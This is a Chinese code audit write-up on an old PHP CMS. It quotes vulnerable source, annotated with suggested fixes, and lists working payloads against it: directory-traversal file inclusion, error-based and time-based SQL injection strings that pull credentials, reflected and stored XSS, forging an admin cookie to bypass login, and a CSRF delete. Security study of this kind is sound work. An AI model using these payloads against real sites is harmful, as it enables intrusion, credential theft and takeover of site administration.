某cms代码审计

目录结构

admin         --管理后台文件夹
css           --存放css的文件夹
files         --存放页面的文件夹
images        --存放图片的文件夹
inc           --存放网站配置文件的文件夹
install       --网站进行安装的文件夹
seacmseditor  --编辑器文件夹
template      --模板文件夹
upload        --上传功能文件夹
index.php     --网站首页

文件包含漏洞

index.php

<?php
// Single entry point: every front-end page is reached through ?r=<name>.
error_reporting(0); // disable error display
$file = addslashes($_GET['r']); // receive the page name from the query string
$action = $file == '' ? 'index' : $file; // default to 'index' when the parameter is empty
// Local file inclusion: addslashes() only escapes quotes and backslashes, so a
// '../' in $action still walks out of the files/ directory. The fix is to map
// $action against a fixed allow-list of page names (or reject anything outside
// [A-Za-z0-9_]) before building the include path.
include('files/' . $action . '.php'); // load the matching page

GET传值r,用函数addslashes转义我们传入的值,防止命令执行、sql注入等,但是这里对文件包含并没有影响

存在目录穿越,既可以包含files目录中的文件,也可以通过 ../ 包含根目录中的文件

我们在files文件夹下新建一个2.php 根目录新建1.php

payload:
?r=2 //包含files文件夹下的phpinfo()
?r=../1  //包含根目录的phpinfo()

第二处 admin/index.php 也存在同样的问题

SQL注入漏洞

admin/login.php

<?php
// Admin login handler (admin/login.php). Reads the POST form and, on success,
// stores the user name in a plain cookie that inc/checklogin.php later trusts.
ob_start();
require '../inc/conn.php';
$login = $_POST['login'];
$user = $_POST['user'];
$password = $_POST['password'];
$checkbox = $_POST['checkbox'];

if ($login <> "") {
    // SQL injection: $user is interpolated into the query with no escaping or
    // parameter binding; a prepared statement (PDO/mysqli) is the fix.
    $query = "SELECT * FROM manage WHERE user='$user'";
    // Debug output: echoes the full SQL statement to the client.
    echo $query;
    // die(mysql_error()) returns the raw database error to the browser,
    // which is what makes error-based injection possible here.
    $result = mysql_query($query) or die('SQL语句有误:' . mysql_error());
    $users = mysql_fetch_array($result);

    if (!mysql_num_rows($result)) {
        echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
        exit;
    } else {
        $passwords = $users['password'];
        // Passwords are stored as unsalted MD5 and compared with a loose <>;
        // password_hash()/password_verify() is the modern replacement.
        if (md5($password) <> $passwords) {
            echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
            exit;
        }
// Write the login info and remember it for 30 days.
        // The "session" is only the user name in a client-controlled cookie, with
        // no server-side state or signature, so it can be forged (see inc/checklogin.php).
        if ($checkbox == 1) {
            setcookie('user', $user, time() + 3600 * 24 * 30, '/');
        } else {
            setcookie('user', $user, 0, '/');
        }
        echo "<script>this.location='?r=index'</script>";
        exit;
    }
    exit;
    ob_end_flush(); // unreachable: the exit above always runs first
}
?>

没有对参数进行过滤

SQLmap一把梭

手注:

  • 报错注入
' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ //yong

' and updatexml(1,concat(0x7e,(select group_concat() from information_schema.tables where table_schema='www_xh_com' limit 0,1),0x7e),1)--+ //表名

' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='数据库名' and table_name='表名' limit 0,1),0x7e),1)--+

' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)--+
  • 时间盲注
' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB

admin/softlist.php

<?php
// Software list (admin/softlist.php). The delete action runs on a plain GET
// with no CSRF token; see the comments below for the SQL and output issues.
require '../inc/checklogin.php';
require '../inc/conn.php';
$wzlistopen = 'class="open"';
$pageyema = "?r=wzlist&page=";

$delete = $_GET['delete'];
if ($delete <> "") {
    // SQL injection: $delete is interpolated unescaped; bind it as an integer parameter.
    $query = "DELETE FROM download WHERE id='$delete'";
    // mysql_error() in the response enables error-based injection.
    $result = mysql_query($query) or die('SQL语句有误:' . mysql_error());
    // $delete is also reflected into the page without encoding.
    echo "<script>alert('亲,ID为" . $delete . "的内容已经成功删除!');location.href='?r=softlist'</script>";
    exit;
}
?>

无过滤,开启了mysql错误回显,直接报错注入

http://www.xh.com/admin/?r=softlist&delete=' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

执行结果:

admin/editlink.php

<?php
// Link editor (admin/editlink.php); listing excerpt.
require '../inc/checklogin.php';
require '../inc/conn.php';
$linklistopen = 'class="open"';
$id = $_GET['id'];
// SQL injection: raw $id interpolated; use a prepared statement or an (int) cast.
$query = "SELECT * FROM link WHERE id='$id'";
echo $query; // debug output: leaks the statement to the client
// mysql_error() in the response enables error-based injection.
$resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());
$link = mysql_fetch_array($resul);

无过滤,报错注入,时间盲注

' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

admin/editcolumn.php

<?php
// Column editor (admin/editcolumn.php). Both branches below interpolate the
// raw $id into SQL; a prepared statement (or an (int) cast) is the fix.
require '../inc/checklogin.php';
require '../inc/conn.php';
$columnopen = 'class="open"';
$id = $_GET['id'];
$type = $_GET['type'];
if ($type == 1) {
    $query = "SELECT * FROM nav WHERE id='$id'";
    echo $query; // debug output: leaks the statement to the client
    // mysql_error() in the response enables error-based injection.
    $resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());
    $nav = mysql_fetch_array($resul);
}
if ($type == 2) {
    $query = "SELECT * FROM navclass WHERE id='$id'";
    $resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());
    $nav = mysql_fetch_array($resul);
}

无过滤,报错注入,时间盲注

' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

admin/editsoft.php

<?php
// Software editor (admin/editsoft.php); listing excerpt.
require '../inc/checklogin.php';
require '../inc/conn.php';
$wzlistopen='class="open"';
$id=$_GET['id'];
// SQL injection: raw $id interpolated; use a prepared statement or an (int) cast.
$query = "SELECT * FROM download WHERE id='$id'";
// mysql_error() in the response enables error-based injection.
$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$download = mysql_fetch_array($resul);

无过滤,报错注入,时间盲注

' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

admin/columnlist.php

<?php
// Column list (admin/columnlist.php). Both delete actions run on a plain GET
// with no CSRF token and interpolate the raw id into the DELETE statement.
require '../inc/checklogin.php';
require '../inc/conn.php';
$columnlistopen = 'class="open"';

$delete = $_GET['delete'];

$delete2 = $_GET['delete2'];

if ($delete <> "") {
    // SQL injection: bind $delete as an integer parameter instead of interpolating it.
    $query = "DELETE FROM nav WHERE id='$delete'";
    // mysql_error() in the response enables error-based injection.
    $result = mysql_query($query) or die('SQL语句有误:' . mysql_error());
    // $delete is also reflected into the page without encoding.
    echo "<script>alert('亲,ID为" . $delete . "的栏目已经成功删除!');location.href='?r=columnlist'</script>";
    exit;
}
if ($delete2 <> "") {
    // Same issue as above for $delete2.
    $query = "DELETE FROM navclass WHERE id='$delete2'";
    $result = mysql_query($query) or die('SQL语句有误:' . mysql_error());
    echo "<script>alert('亲,ID为" . $delete2 . "的二级栏目已经成功删除!');location.href='?r=columnlist'</script>";
    exit;
}
?>

无过滤,开启mysql错误显示,时间盲注,报错注入,布尔盲注

' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

这样类似的漏洞还有很多,毕竟这个cms很老了,而且还是一个人开发的

前台

file/software.php

<?php
// Front-end download page (file/software.php).
require 'inc/conn.php';
require 'inc/time.class.php';
$query = "SELECT * FROM settings";
$resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());
$info = mysql_fetch_array($resul);
// addslashes() only escapes quote characters; it is not a substitute for
// casting the id to int or binding it as a parameter.
$id = addslashes($_GET['cid']);
// Quoted context: here the escaping above at least forces a quote to be closed ...
$query = "SELECT * FROM download WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());
$download = mysql_fetch_array($resul);
// Hit counter
// ... but $id is unquoted in this UPDATE, so no quote needs closing and
// addslashes() provides no protection. An (int) cast would close this.
$query = "UPDATE download SET hit = hit+1 WHERE id=$id";
echo $query; // debug output: leaks the statement to the client
// @ suppresses the warning, but die() still returns mysql_error() to the browser.
@mysql_query($query) or die('修改错误:' . mysql_error());

?>

$id 被直接拼接进未加引号的 SQL 语句中,注入时无需闭合引号,因此 addslashes 函数起不到防护作用

XSS漏洞

反射型

file/contact.php

// Pagination parameter (file/contact.php): addslashes() escapes quotes only and
// does nothing to HTML, so $page is later reflected unencoded (reflected XSS);
// htmlspecialchars() at output time, or an (int) cast here, is the fix.
$page = addslashes($_GET['page']);
if ($page <> "") {
    if ($page <> 1) {
        $pages = "第" . $page . "页 - ";
    }
}

<?php echo $page /* XSS sink: $page is output without htmlspecialchars() */ ?>

addslashes 函数只转义引号和反斜杠,并不会过滤 HTML/JS 标签

http://www.xh.com/?r=contact&page=<script>alert(1)</script>
http://www.xh.com/?r=contact&page=<img src=1 onerror=alert(/xss/)>

存储型

admin/file/mangeinfo.php

// Admin profile update (admin/file/mangeinfo.php). All values come straight
// from POST; none is validated, escaped for SQL, or encoded for HTML output.
$save=$_POST['save'];

$user=$_POST['user'];
$name=$_POST['name'];
$password=$_POST['password'];
$password2=$_POST['password2'];
$img=$_POST['img']; // read but not used in the code shown here
$mail=$_POST['mail'];
$qq=$_POST['qq'];

// No CSRF token is checked before the state-changing update below.
if ($save==1){

if ($user==""){
echo "<script>alert('抱歉,帐号不能为空。');history.back()</script>";
exit;
    }

if ($name==""){
echo "<script>alert('抱歉,名称不能为空。');history.back()</script>";
exit;
    }
if ($password<>$password2){
echo "<script>alert('抱歉,两次密码输入不一致!');history.back()</script>";
exit;
    }

// Handle the avatar upload
if(!empty($_FILES['images']['tmp_name'])){
$query = "SELECT * FROM imageset";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$imageset = mysql_fetch_array($result);
include '../inc/up.class.php';
// NOTE(review): $HTTP_POST_FILES is the pre-PHP-5.4 long-form superglobal; on
// current PHP it is unset, so this empty() check is always true and does not
// re-validate the upload.
if (empty($HTTP_POST_FILES['images']['tmp_name']))// check whether the received data is empty
{
        $tmp = new FileUpload_Single;
        $upload="../upload/touxiang";// upload directory: the upload dir under the current directory, adjust as needed
        $tmp -> accessPath =$upload;
        if ( $tmp -> TODO() )
        {
            $filename=$tmp -> newFileName;// generated file name
            $filename=$upload.'/'.$filename;
            $imgsms="及图片";

        }       
}
}

// $filename, $images and $imgsms are only assigned on the upload path above;
// without an upload they are undefined when read here and below.
if ($filename<>""){
$images="img='$filename',"; 
}

if ($password<>""){
$password=md5($password); // unsalted MD5; password_hash() is the modern replacement
$password="password='$password',";
}

// SQL injection and stored XSS: every field is interpolated raw and stored
// without validation or encoding. The statement also has no WHERE clause,
// so it rewrites every row of `manage`.
$query = "UPDATE manage SET 
user='$user',
name='$name',
$password
$images
mail='$mail',
qq='$qq',
date=now()";
@mysql_query($query) or die('修改错误:'.mysql_error());
echo "<script>alert('亲爱的,资料".$imgsms."设置已成功更新!');location.href='?r=manageinfo'</script>"; 
exit;
}
?>

POST 传参,但是无任何过滤,直接跟数据库进行交互,存在存储型 XSS

payload:

<img src=1 onerror=alert(/xss/)>

垂直越权

inc/checklogin.php

<?php
// Admin access check (inc/checklogin.php): the only gate is whether the
// client-controlled 'user' cookie is non-empty. There is no server-side
// session, signature or database lookup, so any value (e.g. user=admin)
// passes; a server-side session established at login is the fix.
$user=$_COOKIE['user'];
if ($user==""){
header("Location: ?r=login");
exit;   
}
?>
POST /admin/?r=login HTTP/1.1
Host: www.xh.com
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.xh.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.xh.com/admin/?r=login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=moiv7ip0kf500du1luv2ccr333; name=dasd; mail=dasd;user=admin
Connection: close

user=&password=&login=yes

在cookie中添加一个新的属性:user=admin

CSRF漏洞

/admin/files/wzlist.php

// Article list delete handler (admin/files/wzlist.php); excerpt — the closing
// brace of this if block is outside the listing.
$delete=$_GET['delete'];
if ($delete<>""){
// State-changing action on a GET request with no CSRF token, and $delete is
// interpolated into SQL unescaped; it is also reflected into the page below.
$query = "DELETE FROM content WHERE id='$delete'";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());
echo "<script>alert('亲,ID为".$delete."的内容已经成功删除!');location.href='?r=wzlist'</script>";
exit;

在内容管理→文章列表删除文章,点击删除抓包,得到url:

www.xh.com/admin/?r=wzlist&delete=18

抓包,在cookie处,添加一个新的属性:user=admin,更改delete的值就可以实现csrf

